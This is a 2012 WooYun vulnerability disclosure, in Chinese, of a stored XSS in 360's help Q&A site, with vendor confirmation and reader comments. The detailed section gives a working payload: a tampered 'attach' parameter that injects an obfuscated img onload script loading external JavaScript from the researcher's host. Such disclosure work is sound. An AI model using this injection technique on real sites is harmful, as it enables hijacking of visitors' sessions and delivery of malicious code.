当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08141

漏洞标题:360某站存储型XSS - 俺是来看360收乌云发的洞不~~

相关厂商:奇虎360

漏洞作者: gainover

提交时间:2012-06-10 14:20

修复时间:2012-07-25 14:21

公开时间:2012-07-25 14:21

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-10: 细节已通知厂商并且等待厂商处理中
2012-06-10: 厂商已经确认,细节仅向厂商公开
2012-06-20: 细节向核心白帽子及相关领域专家公开
2012-06-30: 细节向普通白帽子公开
2012-07-10: 细节向实习白帽子公开
2012-07-25: 细节向公众公开

简要描述:

昨天看到群里的Snow说360又有WEB类的奖励了,兴致勃勃的提交了攒了好久的反射型XSS过去。结果回复是有人提交了。 = = 还好俺攒的多,就又发了一个,这次360回复确认了,周一安排奖励,挺好。
360大部分都是客户端产品,WEB类的网站,大多本质都是导航类的网站,有用户内容交互的网站为数不多,比如论坛...,所以俺这个存储型XSS,对360的用户安全危害应该算是挺大的了,而且攻击可以做到很高的隐蔽性。
PS:如果不算之前那个误报的~, 貌似是乌云上360的第一个的存储型XSS
----------------------------------
QQ的漏洞响应平台已经明确指出:“1、奖励只针对通过TSRC官网在线漏洞提交系统反馈的用户”
在360的奖励页面,暂时未发现上述规定,只有“并对符合信息保密原则和获奖资格的报告者予以公开”这一条规定,因为乌云也是对漏洞有保密措施的, 这是否意味着通过乌云提交的漏洞,也可以获得相应奖励?
或者说,360也默许了QQ的那条规定?一定要“直接”提交给你们,才发放奖励呢?
---------------
哈哈,不好意思,俺又发牢骚了。 只是觉得乌云做起来不容易,你们搞安全的应该多多支持乌云才对。

详细说明:

1. 首先是google搜索, inurl:(upload) site:360.cn
发现:http://help.360.cn/upload.html 这个页面。
2. 然后就去 help.360.cn ,一看,原来是一个问答型的网站。
3. 找了个问题,回答了一下,并上传了一个rar附件。 然后提交回复,同时抓包。
4. 还是俺的老习惯。 F12,打开调试工具,查看刚回复的内容。看输出。


同时,我们可以注意抓包的内容,看输入


5. 如果输入没过滤 ", > 就会带来问题。 因此,我先讲 attach 参数改为以下内容:
|help_7f7b1b4ef061be3a">.rar|help_7f7b1b4ef061be3a.rar
6. 提交后,查看页面,可以看到,由于提前关闭HTML标签,代码侧漏了。
7. 因而我们可以进一步构造利用代码。

POST http://help.360.cn/index.php?c=insert&a=doedit
POSTDATA
attach 参数修改为:
|help_7f7b1b4ef061be3a"><img/src="/img/attach.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,110,111,46,106,115);document.body.appendChild(window.s)"><a/style="display:none"b=".rar|help_7f7b1b4ef061be3a.rar


8. 考虑到网站访问量可能较大,为了避免测试的时候,被不良之人看到弹窗了,上面的代码仅仅是加载了我自己网站的一个空的JS文件。
打开httpwatch,对被插入代码的页面进行抓包,可以看到,我的JS文件被加载了。


进一步证明,打开调试工具,定位到插入的内容。


漏洞证明:

见详细说明。

修复方案:

对 http://help.360.cn/index.php?c=insert&a=doedit 页面,在提交问题和编辑问题时发送的attach参数进行严格的审查过滤。

版权声明:转载请注明来源 gainover@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-06-10 15:08

厂商回复:

感谢您对360的支持,您反馈的漏洞已经确认并正在修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-10 14:24 | random_ ( 普通白帽子 | Rank:295 漏洞数:50 | 推动开源推动网络安全)

    360奖什么 哈哈

  2. 2012-06-10 14:33 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @random_ XSS类的, 键盘,鼠标,U盘。

  3. 2012-06-10 14:35 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @gainover 那腾讯的奖什么?

  4. 2012-06-10 14:35 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。乌云不是到一定时间会公开的么?

  5. 2012-06-10 14:37 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @shine = = 腾讯奖奖品吧。。具体的什么奖品不清楚,百度“腾讯漏洞响应中心”

  6. 2012-06-10 14:37 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @px1624 保密原则是指,在漏洞未修复前,不进行公开传播。并不是说不能公开。

  7. 2012-06-10 14:45 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @gainover 人家只是提供安全公告,又不是细节、

  8. 2012-06-10 15:07 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    今天用wvs也整出360一个XSS

  9. 2012-06-10 15:09 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    厂商响应挺快~~~

  10. 2012-06-10 15:11 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    @奇虎360 对在乌云平台发360的漏洞给不给奖品表个态呀

  11. 2012-06-10 15:25 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @z@cx 嘿嘿,小心360说你的扫描影响他们正常运行了。。

  12. 2012-06-10 16:17 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    @gainover 额。。。

  13. 2012-09-28 00:50 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    各种猥琐的插入姿势